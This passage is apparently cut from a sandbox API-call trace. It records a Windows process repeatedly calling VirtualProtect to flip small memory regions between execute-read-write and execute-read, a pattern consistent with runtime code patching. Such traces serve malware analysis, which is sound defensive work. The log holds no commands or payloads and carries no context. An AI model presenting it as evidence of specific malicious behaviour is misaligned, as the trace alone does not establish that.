lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.782] VirtualProtect (in: lpAddress=0x1e722b2, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.782] VirtualProtect (in: lpAddress=0x1e722b2, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.782] VirtualProtect (in: lpAddress=0x1e72304, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.782] VirtualProtect (in: lpAddress=0x1e72304, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.782] VirtualProtect (in: lpAddress=0x1e72308, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.782] VirtualProtect (in: lpAddress=0x1e72308, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.783] VirtualProtect (in: lpAddress=0x1e7233e, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.783] VirtualProtect (in: lpAddress=0x1e7233e, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.783] VirtualProtect (in: lpAddress=0x1e72414, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.783] VirtualProtect (in: lpAddress=0x1e72414, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.783] VirtualProtect (in: lpAddress=0x1e7247c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.784] VirtualProtect (in: lpAddress=0x1e7247c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.784] VirtualProtect (in: lpAddress=0x1e72480, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.784] VirtualProtect (in: lpAddress=0x1e72480, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.784] VirtualProtect (in: lpAddress=0x1e724b7, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.784] VirtualProtect (in: lpAddress=0x1e724b7, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.784] VirtualProtect (in: lpAddress=0x1e724cf, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.785] VirtualProtect (in: lpAddress=0x1e724cf, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.785] VirtualProtect (in: lpAddress=0x1e724d4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.785] VirtualProtect (in: lpAddress=0x1e724d4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.785] VirtualProtect (in: lpAddress=0x1e724da, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.785] VirtualProtect (in: lpAddress=0x1e724da, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.786] VirtualProtect (in: lpAddress=0x1e724df, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.786] VirtualProtect (in: lpAddress=0x1e724df, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.786] VirtualProtect (in: lpAddress=0x1e724e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.786] VirtualProtect (in: lpAddress=0x1e724e8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.786] VirtualProtect (in: lpAddress=0x1e72508, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.786] VirtualProtect (in: lpAddress=0x1e72508, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.787] VirtualProtect (in: lpAddress=0x1e72515, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.787] VirtualProtect (in: lpAddress=0x1e72515, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.787] VirtualProtect (in: lpAddress=0x1e72524, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.787] VirtualProtect (in: lpAddress=0x1e72524, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.787] VirtualProtect (in: lpAddress=0x1e72540, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.787] VirtualProtect (in: lpAddress=0x1e72540, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.788] VirtualProtect (in: lpAddress=0x1e72546, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.788] VirtualProtect (in: lpAddress=0x1e72546, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.788] VirtualProtect (in: lpAddress=0x1e72567, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.788] VirtualProtect (in: lpAddress=0x1e72567, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.788] VirtualProtect (in: lpAddress=0x1e7256e, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.789] VirtualProtect (in: lpAddress=0x1e7256e, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.789] VirtualProtect (in: lpAddress=0x1e72573, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.789] VirtualProtect (in: lpAddress=0x1e72573, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.789] VirtualProtect (in: lpAddress=0x1e72579, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.789] VirtualProtect (in: lpAddress=0x1e72579, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.789] VirtualProtect (in: lpAddress=0x1e7257e, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.790] VirtualProtect (in: lpAddress=0x1e7257e, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.790] VirtualProtect (in: lpAddress=0x1e72585, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.790] VirtualProtect (in: lpAddress=0x1e72585, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.790] VirtualProtect (in: lpAddress=0x1e72594, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.790] VirtualProtect (in: lpAddress=0x1e72594, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.790] VirtualProtect (in: lpAddress=0x1e72626, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.791] VirtualProtect (in: lpAddress=0x1e72626, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.791] VirtualProtect (in: lpAddress=0x1e72630, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.791] VirtualProtect (in: lpAddress=0x1e72630, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.791] VirtualProtect (in: lpAddress=0x1e72634, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.791] VirtualProtect (in: lpAddress=0x1e72634, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.792] VirtualProtect (in: lpAddress=0x1e72638, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.792] VirtualProtect (in: lpAddress=0x1e72638, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.792] VirtualProtect (in: lpAddress=0x1e7263c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.792] VirtualProtect (in: lpAddress=0x1e7263c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.792] VirtualProtect (in: lpAddress=0x1e72640, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.792] VirtualProtect (in: lpAddress=0x1e72640, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.793] VirtualProtect (in: lpAddress=0x1e72644, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.793] VirtualProtect (in: lpAddress=0x1e72644, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.793] VirtualProtect (in: lpAddress=0x1e72648, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.793] VirtualProtect (in: lpAddress=0x1e72648, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.793] VirtualProtect (in: lpAddress=0x1e7264c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.794] VirtualProtect (in: lpAddress=0x1e7264c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.794] VirtualProtect (in: lpAddress=0x1e72650, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.794] VirtualProtect (in: lpAddress=0x1e72650, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.794] VirtualProtect (in: lpAddress=0x1e72654, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.794] VirtualProtect (in: lpAddress=0x1e72654, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.794] VirtualProtect (in: lpAddress=0x1e72658, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.795] VirtualProtect (in: lpAddress=0x1e72658, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.795] VirtualProtect (in: lpAddress=0x1e7265c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.795] VirtualProtect (in: lpAddress=0x1e7265c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.795] VirtualProtect (in: lpAddress=0x1e72660, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.795] VirtualProtect (in: lpAddress=0x1e72660, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.795] VirtualProtect (in: lpAddress=0x1e72664, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.796] VirtualProtect (in: lpAddress=0x1e72664, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.796] VirtualProtect (in: lpAddress=0x1e72668, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.796] VirtualProtect (in: lpAddress=0x1e72668, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.796] VirtualProtect (in: lpAddress=0x1e7266c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.796] VirtualProtect (in: lpAddress=0x1e7266c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.797] VirtualProtect (in: lpAddress=0x1e72670, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.797] VirtualProtect (in: lpAddress=0x1e72670, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.797] VirtualProtect (in: lpAddress=0x1e72674, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.797] VirtualProtect (in: lpAddress=0x1e72674, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.797] VirtualProtect (in: lpAddress=0x1e72678, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.797] VirtualProtect (in: lpAddress=0x1e72678, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.798] VirtualProtect (in: lpAddress=0x1e7267c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.798] VirtualProtect (in: lpAddress=0x1e7267c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.798] VirtualProtect (in: lpAddress=0x1e72680, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.798] VirtualProtect (in: lpAddress=0x1e72680, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.798] VirtualProtect (in: lpAddress=0x1e72684, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.799] VirtualProtect (in: lpAddress=0x1e72684, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.799] VirtualProtect (in: lpAddress=0x1e72688, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.799] VirtualProtect (in: lpAddress=0x1e72688, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.799] VirtualProtect (in: lpAddress=0x1e7268c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.799] VirtualProtect (in: lpAddress=0x1e7268c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.799] VirtualProtect (in: lpAddress=0x1e72690, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.800] VirtualProtect (in: lpAddress=0x1e72690, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.800] VirtualProtect (in: lpAddress=0x1e72694, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.800] VirtualProtect (in: lpAddress=0x1e72694, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.800] VirtualProtect (in: lpAddress=0x1e72698, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.801] VirtualProtect (in: lpAddress=0x1e72698, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.801] VirtualProtect (in: lpAddress=0x1e7269c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.801] VirtualProtect (in: lpAddress=0x1e7269c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.801] VirtualProtect (in: lpAddress=0x1e726a0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.801] VirtualProtect (in: lpAddress=0x1e726a0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.802] VirtualProtect (in: lpAddress=0x1e726a4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.802] VirtualProtect (in: lpAddress=0x1e726a4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.802] VirtualProtect (in: lpAddress=0x1e726a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.802] VirtualProtect (in: lpAddress=0x1e726a8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.802] VirtualProtect (in: lpAddress=0x1e726ac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.802] VirtualProtect (in: lpAddress=0x1e726ac, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.803] VirtualProtect (in: lpAddress=0x1e726b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.803] VirtualProtect (in: lpAddress=0x1e726b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.803] VirtualProtect (in: lpAddress=0x1e726b4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.803] VirtualProtect (in: lpAddress=0x1e726b4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.803] VirtualProtect (in: lpAddress=0x1e726b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.803] VirtualProtect (in: lpAddress=0x1e726b8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.804] VirtualProtect (in: lpAddress=0x1e726bc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.804] VirtualProtect (in: lpAddress=0x1e726bc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.804] VirtualProtect (in: lpAddress=0x1e726c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.804] VirtualProtect (in: lpAddress=0x1e726c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.804] VirtualProtect (in: lpAddress=0x1e726c4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.805] VirtualProtect (in: lpAddress=0x1e726c4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.805] VirtualProtect (in: lpAddress=0x1e726c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.805] VirtualProtect (in: lpAddress=0x1e726c8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.805] VirtualProtect (in: lpAddress=0x1e726cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.805] VirtualProtect (in: lpAddress=0x1e726cc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.805] VirtualProtect (in: lpAddress=0x1e726d0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.806] VirtualProtect (in: lpAddress=0x1e726d0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.806] VirtualProtect (in: lpAddress=0x1e726d4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.806] VirtualProtect (in: lpAddress=0x1e726d4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.806] VirtualProtect (in: lpAddress=0x1e726d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.806] VirtualProtect (in: lpAddress=0x1e726d8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.807] VirtualProtect (in: lpAddress=0x1e726dc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.807] VirtualProtect (in: lpAddress=0x1e726dc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.807] VirtualProtect (in: lpAddress=0x1e726e0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.807] VirtualProtect (in: lpAddress=0x1e726e0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.807] VirtualProtect (in: lpAddress=0x1e726e4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.807] VirtualProtect (in: lpAddress=0x1e726e4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.808] VirtualProtect (in: lpAddress=0x1e726e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.808] VirtualProtect (in: lpAddress=0x1e726e8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.808] VirtualProtect (in: lpAddress=0x1e726ec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.808] VirtualProtect (in: lpAddress=0x1e726ec, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.808] VirtualProtect (in: lpAddress=0x1e726f0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.808] VirtualProtect (in: lpAddress=0x1e726f0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.809] VirtualProtect (in: lpAddress=0x1e726f4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.809] VirtualProtect (in: lpAddress=0x1e726f4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.809] VirtualProtect (in: lpAddress=0x1e726f8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.809] VirtualProtect (in: lpAddress=0x1e726f8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.809] VirtualProtect (in: lpAddress=0x1e726fc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.810] VirtualProtect 